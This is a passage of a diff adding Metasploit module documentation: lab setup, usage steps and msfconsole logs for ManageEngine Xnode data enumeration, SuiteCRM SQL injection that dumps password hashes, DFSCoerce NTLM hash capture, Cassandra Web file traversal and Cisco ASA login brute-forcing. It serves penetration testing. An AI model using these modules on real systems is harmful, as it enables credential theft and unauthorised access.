+It is also possible to use the `DUMP_ALL` option to obtain all data in all known data repositories without specifying data field names.
+However, note when using this option the data won't be labeled.
+
+This module has been successfully tested against DataSecurity Plus 6.0.1 (6010) running on Windows Server 2012 R2.
+
+## Installation Information
+Vulnerable versions of DataSecurity Plus are available [here](https://archives.manageengine.com/data-security/).
+All versions from 6000 through 6011 are configured with default Xnode credentials. Note that testing against
+vulnerable versions from the archives will make data enumeration impossible because the free trials for those
+versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.
+
+However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions,
+so it is possible to test the modules against patched versions as long as the correct credentials are provided.
+
+A free 30-day trial of DataSecurity Plus can be downloaded [here](https://www.manageengine.com/data-security/download.html).
+To install, just run the .exe and follow the instructions.
+
+In order to configure a patched ManageEngine DataSecurity Plus instance for testing, follow these steps:
+- Open the Xnode config file at `<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf`
+- Note down the username and password
+- Insert the following line:
+```
+xnode.connector.accept_remote_request = true
+```
+To launch DataSecurity Plus, run Command Prompt as administrator and run: `<install_dir>\bin\run.bat`
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/manageengine_datasecurity_plus_xnode_enum`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Options
+### CONFIG_FILE
+YAML File specifying the data repositories (tables) and fields (columns) to dump.
+
+### DUMP_ALL
+Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+
+## Scenarios
+### ManageEngine DataSecurity Plus 6.0.1 (6010) on Windows Server 2012
+```
+msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > options 
+
+Module options (auxiliary/gather/manageengine_datasecurity_plus_xnode_enum):
+
+   Name         Current Setting                                                Required  Description
+   ----         ---------------                                                --------  -----------
+   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ine_xnode/CVE-2020-11532/datasecurity_plus_xnode_conf.yaml
+   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29119                                                          yes       The target port (TCP)
+   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > run
+[*] Running module against 192.168.1.41
+
+[*] 192.168.1.41:29119 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.41:29119 - Target seems to be Xnode.
+[+] 192.168.1.41:29119 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.41:29119 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.41:29119 - Target is running Xnode version: "XNODE_1_0_0".
+[*] 192.168.1.41:29119 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\DataSecurity Plus\apps\dataengine-xnode".
+[*] 192.168.1.41:29119 - Data repository DSPEmailAuditAttachments is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEmailAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointClassificationReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointIncidentReport is empty.
+[*] 192.168.1.41:29119 - Data repository DspEndpointPrinterAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DspEndpointWebAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPFileAnalysisAlerts is empty.
+[*] 192.168.1.41:29119 - Data repository RAAlertHistory is empty.
+[*] 192.168.1.41:29119 - Data repository RAIncidents is empty.
+[*] 192.168.1.41:29119 - Data repository RAViolationRecords is empty.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,195 @@
+## Description
+This module exploits an authenticated SQL injection in SuiteCRM installations below or equal to version 7.12.5. The 
+vulnerability allows for union and blind boolean based SQLi to be exploited in order to collect usernames and password 
+hashes from the SuiteCRM database.
+
+## Vulnerable Application
+
+The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM.
+There should be one in SuiteCRM by default for the administrative user. If you want to test multiple users,
+browse to `/index.php?module=Users&action=index` and then click the `Create New User` button on the left side
+of the screen. Then enter a username and a last name. Then click the `password` tab, and enter a password for
+the user, then confirm this password and click the `Save` button to create the user.
+
+### Docker compose
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+To create a SuiteCRM 7.12.5 Docker container, first create a new folder, 
+then save the following content as `docker-compose.yml`:
+
+```
+version: '2'
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_suitecrm
+      - MARIADB_DATABASE=bitnami_suitecrm
+      - MARIADB_PASSWORD=bitnami123
+    volumes:
+      - 'mariadb_data:/bitnami/mariadb'
+  suitecrm:
+    image: docker.io/bitnami/suitecrm:7.12.5
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - SUITECRM_DATABASE_HOST=mariadb
+      - SUITECRM_DATABASE_PORT_NUMBER=3306
+      - SUITECRM_DATABASE_USER=bn_suitecrm
+      - SUITECRM_DATABASE_NAME=bitnami_suitecrm
+      - SUITECRM_DATABASE_PASSWORD=bitnami123
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'suitecrm_data:/bitnami/suitecrm'
+    depends_on:
+      - mariadb
+volumes:
+  mariadb_data:
+    driver: local
+  suitecrm_data:
+    driver: local 
+```
+
+Finally, in the same directory as the `docker-compose.yml` file, run: `docker-compose up -d`.
+
+Note that the default username to log in will be `user` and the password will be `bitnami`. If you
+want to change these, put the following lines under the `environment` section:
+
+```
+    environment:
+      - SUITECRM_USERNAME=my_user
+      - SUITECRM_PASSWORD=my_password
+```
+
+The above would set the username to `my_user` and the password to `my_password`.
+
+For more information on the docker compose file, refer to
+https://github.com/bitnami/containers/tree/main/bitnami/suitecrm.
+
+### Install from source
+
+Source code can be found here: [SuiteCRM v7.12.5](https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz) 
+
+Instructions on installing from source can be found here: [Installation Guide](https://docs.suitecrm.com/admin/installation-guide/downloading-installing/) 
+
+The following setup was installed on Ubuntu 20.04:
+
+1. Setup and install MySQL:
+    1. `sudo apt update`
+    1. `sudo apt install mysql-server`
+    1. `sudo systemctl start mysql.service`
+    1. `sudo mysql` (open the mysql prompt)
+    1. `mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';` (change the password 
+       of the root user)
+       
+1. Install Apache
+    1. `sudo apt install apache2`
+    1. `sudo systemctl enable apache2`
+    1. `sudo systemctl start apache2`
+       
+1. Install php and its dependencies
+    1. `sudo apt -y install php7.4`
+    1. `sudo apt install -y php-cli php-common php-curl php-mbstring php-gd php-mysql php-soap php-xml php-imap php-intl php-opcache php-json php-zip`
+    1. `sudo apt install composer`
+    1. `composer install`
+    
+1. Setup and install SuiteCRM 7.12.5
+    1. `wget https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz`
+    1. `gunzip v7.12.5.tar.gz`
+    1. `tar -xvf v7.12.5.tar`
+    1. `sudo cp -r SuiteCRM-7.12.5/. /var/www/html`
+    1. `cd /var/www/html`
+    1. `sudo chown -R www-data:www-data .`
+    1. `sudo chmod -R 755 .`
+    1. `sudo chmod -R 775 custom modules themes data upload`
+    1. `sudo chmod 775 config_override.php 2>/dev/null`
+    1. Navigate to http://localhost/install.php and follow the installation wizard to complete the install
+    
+
+## Verification Steps
+
+1. Start up metasploit
+1. Do: `use auxiliary/gather/suite_crm_export_sqli`
+1. Do: `set RHOSTS [IP]`
+1. Configure a user and password by setting `USERNAME` and `PASSWORD`.
+1. Do: `run`
+
+## Scenarios
+
+### SuiteCRM 7.12.5 Bitnami Docker Image
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/suite_crm_export_sqli 
+msf6 auxiliary(gather/suite_crm_export_sqli) > show options
+
+Module options (auxiliary/gather/suite_crm_export_sqli):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   COUNT     3                no        Number of users to enumerate
+   PASSWORD                   yes       Password for user
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
+                                        loit
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       Username of user
+   VHOST                      no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name              Description
+   ----              -----------
+   Dump credentials  Dumps usernames and passwords from the users table
+
+
+msf6 auxiliary(gather/suite_crm_export_sqli) > set USERNAME user
+USERNAME => user
+msf6 auxiliary(gather/suite_crm_export_sqli) > set PASSWORD bitnami
+PASSWORD => bitnami
+msf6 auxiliary(gather/suite_crm_export_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/suite_crm_export_sqli) > check
+
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] 127.0.0.1:80 - The target is vulnerable.
+msf6 auxiliary(gather/suite_crm_export_sqli) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] The target is vulnerable.
+[*] Fetching Users, please wait...
+SuiteCRM User Names
+===================
+
+ Username
+ --------
+ testuser
+ user
+
+[*] Fetching Hashes, please wait...
+[+] (1/2) Username : testuser ; Hash : $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+[+] (2/2) Username : user ; Hash : $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+SuiteCRM User Credentials
+=========================
+
+ Username  Hash
+ --------  ----
+ testuser  $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+ user      $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/suite_crm_export_sqli) > 
+```
@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/dcerpc/dfscoerce`
+4. Set the `RHOSTS` and `LISTENER` options
+5. Set the `SMBUser`, `SMBPass` for authentication
+6. (Optional) Set the `METHOD` options to adjust the trigger vector
+7. Do: `run`
+
+## Options
+
+### LISTENER
+The host listening for the incoming connection. The target will authenticate to this host using SMB. The listener host
+should be hosting some kind of capture or relaying service.
+
+### METHOD
+The RPC method to use for triggering.
+
+## Scenarios
+
+### Windows Server 2019
+In this case, Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine
+account. The target is a 64-bit Windows Server 2019 domain controller.
+
+```
+msf6 > use auxiliary/server/capture/smb 
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(server/capture/smb) > 
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+
+msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
+
+[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
+[*] 192.168.159.96:445    - Binding to \netdfs...
+[+] 192.168.159.96:445    - Bound to \netdfs
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv2-SSP Client     : 192.168.250.237
+[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
+[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
+
+[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
+[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/dcerpc/dfscoerce) >
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+[Cassandra Web](https://rubygems.org/gems/cassandra-web) is an interface for Apache Cassandra using Ruby, Event-machine, AngularJS,
+Server-Sent-Events and DataStaxRuby driver for Apache Cassandra.
+
+This module has been tested successfully on Cassandra Web versions:
+* cassandra-web-0.5.0 on Debian 10.11 (buster) with ruby 2.5.5p157 and Apache Cassandra 3.11.13
+
+### Description
+
+This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web
+'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
+This vulnerability occured due to the disabled Rack::Protection module.
+
+This web service listens on TCP port 3000 by default on all network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/avalanche123/cassandra-web)
+* [Installers](https://rubygems.org/gems/cassandra-web)
+
+Ruby installation:
+```
+apt install ruby-full -y
+```
+
+Gem installation:
+```
+gem install cassandra-web
+```
+
+Apache Cassandra Installation:
+```
+cat << EOF > /etc/apt/sources.list.d/cassandra.list
+deb https://www.apache.org/dist/cassandra/debian 311x main
+EOF
+cat << EOF > /etc/apt/sources.list.d/adoptopenjdk.list
+deb https://adoptopenjdk.jfrog.io/adoptopenjdk/deb/ buster main
+EOF
+wget -q -O - https://www.apache.org/dist/cassandra/KEYS | apt-key add -
+wget -qO - https://adoptopenjdk.jfrog.io/adoptopenjdk/api/gpg/key/public | apt-key add -
+apt update && apt install adoptopenjdk-8-hotspot cassandra -y
+```
+
+Run Cassandra Web:
+```
+cassandra-web
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/http/cassandra_web_file_read.rb`
+2. Do: `set RHOSTS [ips]`
+3. Do: `run`
+
+## Options
+
+## Scenarios
+### Cassandra Web 0.5.0 Linux Debian 10.11 (Ruby 2.5.5p157 and Apache Cassandra 3.11.13)
+```
+msf6 > use auxiliary/scanner/http/cassandra_web_file_read
+msf6 auxiliary(scanner/http/cassandra_web_file_read) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/http/cassandra_web_file_read) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Cassandra Web Detected
+[*] Downloading file...
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
+avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+ntp:x:107:115::/nonexistent:/usr/sbin/nologin
+cassandra:x:108:116:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
+
+
+[+] File saved in: /home/git/.msf4/loot/20220802185716_default_192.168.56.1_cassandra.web.tr_160962.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,132 @@
+## Vulnerable Application
+
+### Description
+
+This module scans for the Cisco ASA ASDM landing page and performs login brute-force
+to identify valid credentials.
+
+### Installation
+
+Acquire a Cisco ASA device or virtual machine. For this description we will use
+Cisco Adaptive Security Virtual Appliance (ASAv) VMWare Package 9.18.1 (asav9-18-1.zip):
+
+* https://software.cisco.com/download/home/286119613/type/280775065/release/9.18.1
+
+The [official installation guide can be found here](https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asav/quick-start-book/asav-98-qsg/asav-vmware.html)
+But for completeness, the following will guide the user to a full testing configuration.
+To start we'll make ASDM remotely accessible:
+
+1. Unzip the package
+1. Import `asav-esxi.ovf` in VMWare Fusion (or your VMWare product of choice).
+1. Select the `ASAv5 - 1 Core / 2 GB (100 Mbps)` deployment option.
+1. After the import is complete, assign `Network Adapter` (1 is implied) the desired
+interface (e.g. I'll use `Wi-Fi` for my setup).
+1. Start the virtual machine
+1. Allow GRUB to boot the first option (this should happen twice)
+1. When provided with a command prompt (`ciscoasa>`) type `en`.
+1. Set an enable password (e.g. `labpass1`)
+1. Enter the following in the command line interface:
+1. `conf t`
+1. `No`
+1. `interface GigabitEthernet 0/0`
+1. `nameif outside`
+1. Assign a static ip address (note the assigned address should make sense within the
+context of you lab. For example, my lab network is 10.9.49.0/24): `ip address 10.9.49.201 255.255.255.0`
+1. `no shutdown`
+1. `exit`
+1. Set the default route (the last IP should point to your lab router): `route outside 0.0.0.0 0.0.0.0 10.9.49.1`
+1. Verify you can ping an outside host (e.g. `ping 8.8.8.8`)
+1. `http server enable`
+1. `http 0.0.0.0 0.0.0.0 outside`
+1. `write`
+1. `exit`
+
+You should now be able to reach the ASA's web server remotely. From a remote host, execute the following `curl`
+command to the ASA to verify as much:
+
+```
+albinolobster@ubuntu:~$ curl -kv https://10.9.49.201
+*   Trying 10.9.49.201:443...
+* TCP_NODELAY set
+...
+> GET / HTTP/1.1`
+> Host: 10.9.49.201
+> User-Agent: curl/7.68.0
+> Accept: */*
+> 
+* Mark bundle as not supporting multiuse
+< HTTP/1.1 301 Moved Permanently
+< Date: Tue, 21 Jun 2022 13:52:33 UTC
+< Strict-Transport-Security: max-age=31536000
+< X-XSS-Protection: 1
+< Connection: close
+< Location: /admin/public/index.html
+< 
+* Closing connection 0
+* TLSv1.2 (OUT), TLS alert, close notify (256):
+```
+
+You should now be able to test the credentials `<Blank>:labpass1` and `enable_15:labpass1`. To
+add additional users to test with, let's use ASDM from a Windows machine:
+
+1. Connect to your ASA's web interface (e.g. `https://10.9.49.201/admin/public/index.html`).
+1. Click "Install ASDM Launcher"
+1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password)
+1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned)
+1. If Java isn't installed, install Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
+1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat`
+1. Enter your ASAv's IP address (10.9.249.201)
+1. Enter a blank username
+1. Enter the enable password (`labpass1`)
+1. Go to `Configuration -> Device Management -> Users/AAA -> User Accounts`
+1. Click `Add`
+1. Set the username to `cisco`
+1. Set the password to `cisco123`
+1. Keep the default settings for `Access Restrictions` (Full access with privilege level of 2).
+1. Hit `OK`
+1. Hit `Apply`
+
+You should now be able to log in to the ASDM using `cisco`:`cisco123`.
+
+## Verification Steps
+
+* Follow the above instructions to configure ASAv, ASDM, and add the `cisco` user for testing
+* Do: `use auxiliary/scanner/http/cisco_asa_asdm_bruteforce`
+* Do: `set RHOST <ip>`
+* Do: `set VERBOSE false`
+* Do: `run`
+* You should see output indicating `cisco:cisco123` was successfully used for login.
+
+## Options
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line.
+
+### USER_FILE
+
+File containing users, one per line.
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+## Scenarios
+
+### ASAv 9.18.1 with ASDM enabled and the `cisco:cisco123` creds set.
+
+```
+msf6 > use auxiliary/scanner/http/cisco_asa_asdm_bruteforce
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > run
+
+[*] The remote target appears to host Cisco ASA ASDM. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "cisco":"cisco123"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > 
+```
@@ -0,0 +1,196 @@
+## Vulnerable Application
+
+### Description
+
+This module scans for Cisco ASA Clientless SSL VPN (WebVPN) web login portals and
+performs login brute-force to identify valid credentials.
+
+### Installation
+
+Acquire a Cisco ASA device or virtual machine. For this description we will use
+Cisco Adaptive Security Virtual Appliance (ASAv) VMWare Package 9.18.1 (asav9-18-1.zip):
+
+* https://software.cisco.com/download/home/286119613/type/280775065/release/9.18.1
+
+The [official installation guide can be found here](https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asav/quick-start-book/asav-98-qsg/asav-vmware.html)
+But for completeness, the following will guide the user to a full testing configuration.
+To start we'll make ASDM remotely accessible:
+
+1. Unzip the package
+1. Import `asav-esxi.ovf` in VMWare Fusion (or your VMWare product of choice).
+1. Select the `ASAv5 - 1 Core / 2 GB (100 Mbps)` deployment option.
+1. After the import is complete assign `Network Adapter` (1 is implied) the desired
+interface (e.g. I'll use `Wi-Fi` for my setup).
+1. Start the virtual machine
+1. Allow GRUB to boot the first option (this should happen twice)
+1. When provided with a command prompt (`ciscoasa>`) type `en`.
+1. Set an enable password (e.g. `labpass1`)
+1. Enter the following in the command line interface:
+1. `conf t`
+1. `No`
+1. `interface GigabitEthernet 0/0`
+1. `nameif outside`
+1. Assign a static ip address (note the assigned address should make sense within the
+context of you lab. For example, my lab network is 10.9.49.0/24): `ip address 10.9.49.201 255.255.255.0`
+1. `no shutdown`
+1. `exit`
+1. Set the default route (the last IP should point to your lab router): `route outside 0.0.0.0 0.0.0.0 10.9.49.1`
+1. Verify you can ping an outside host (e.g. `ping 8.8.8.8`)
+1. `http server enable`
+1. `http 0.0.0.0 0.0.0.0 outside`
+1. `write`
+1. `exit`
+
+You should now be able to reach the ASA's web server remotely. From a remote host, execute the following `curl`
+command to the ASA to verify as much:
+
+```
+albinolobster@ubuntu:~$ curl -kv https://10.9.49.201
+*   Trying 10.9.49.201:443...
+* TCP_NODELAY set
+...
+> GET / HTTP/1.1`
+> Host: 10.9.49.201
+> User-Agent: curl/7.68.0
+> Accept: */*
+> 
+* Mark bundle as not supporting multiuse
+< HTTP/1.1 301 Moved Permanently
+< Date: Tue, 21 Jun 2022 13:52:33 UTC
+< Strict-Transport-Security: max-age=31536000
+< X-XSS-Protection: 1
+< Connection: close
+< Location: /admin/public/index.html
+< 
+* Closing connection 0
+* TLSv1.2 (OUT), TLS alert, close notify (256):
+```
+
+The next part of the installation will require a Windows machine. From your Windows machine:
+
+1. Connect to your ASA's web interface (e.g. `https://10.9.49.201/admin/public/index.html`).
+1. Click "Install ASDM Launcher"
+1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password)
+1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned)
+1. If Java isn't installed, intall Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
+1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat`
+1. Enter your ASAv's IP address (10.9.249.201)
+1. Enter a blank username
+1. Enter the enable password (`labpass1`)
+
+Now to enable the webvpn interface from ASDM:
+
+1. Go to `Configuration -> Remote Access VPN -> Clientless SSL VPN Access -> Connection Profiles`
+1. In the `Access Interfaces` view, click the radio button to `Allow Access` from the `outside` interface
+1. Hit apply
+
+Verify that the Clientless SSL VPN is now enabled by navigating to the SSL VPN login on your ASA. For example,
+navigate to `https://10.9.49.201/+CSCOE+/logon.html`.
+
+Next, we'll create a Clientless SSL VPN user for brute-force testing. From ASDM:
+
+1. Go to `Configuration -> Device Management -> Users/AAA -> User Accounts`
+1. Click `Add`
+1. Keep the default username (`user1`)
+1. Enter and confirm a password (e.g. `user1`)
+1. Set the privilege level to 0 (I'm not sure this step is actually required but)
+1. Select the `No ASDM, SSH, Telnet, or Console access` radio
+1. Hit `OK`
+1. Hit `Apply`
+
+Finally, we'll enable logging into the SSL VPN portal:
+
+1. Go to `Configuration -> Device Management -> Users/AAA -> Dynamic Access Policies`
+1. Select the `DfltAccessPolicy` and click `Edit`
+1. Select `Access Method` tab
+1. Click on the `Web-Portal` radio button
+
+You should now be able to log in to the SSL VPN web portal using `user1`:`user1`.
+
+## Verification Steps
+
+* Follow the above instructions to configure ASAv, Clientless SSL VPN, and add a user for testing
+* Add the user to `data/wordlists/http_default_userpass.txt` as `user1 user1`
+* Do: `use auxiliary/scanner/http/cisco_asa_clientless_vpn`
+* Do: `set RHOST <ip>`
+* Do: `set VERBOSE false`
+* Do: `run`
+* You should see output indicating `user1:user1` was successfully used for login.
+
+## Options
+
+### GROUP
+
+The connection profile to use. By default this is blank, but administrators can configure various different
+profiles that users can select from the drop down menu at the top of the login page. The alias in the drop
+down is *not* the value of `GROUP`. You need to extract it from the HTML.
+
+For example, my administrator has a profile named `TunnelGroup1` using the alias `alias1`. The drop down menu
+will show `alias1` but `TunnelGroup1` is the required value. In the page's HTML you'll find:
+
+```
+<option value="TunnelGroup1" selected>alias1</option>
+```
+
+To use `TunnelGroup1` you'd `set GROUP TunnelGroup1`.
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line.
+
+### USER_FILE
+
+File containing users, one per line.
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+## Scenarios
+
+### ASAv 9.18.1 with Clientless SSL VPN enabled and the `user1:user1` creds set.
+
+Simply using the default HTTP username and password lists and `user1:user1` added to
+`data/wordlists/http_default_userpass.txt`.
+
+```
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > use auxiliary/scanner/http/cisco_asa_clientless_vpn
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "user1":"user1"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > 
+```
+
+## ASAv 9.18.1 with Clientless SSL VPN enabled and the `user1:user1` on the `TunnelGroup1` Connection Profile
+
+```
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > use auxiliary/scanner/http/cisco_asa_clientless_vpn
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set GROUP TunnelGroup1
+GROUP => TunnelGroup1
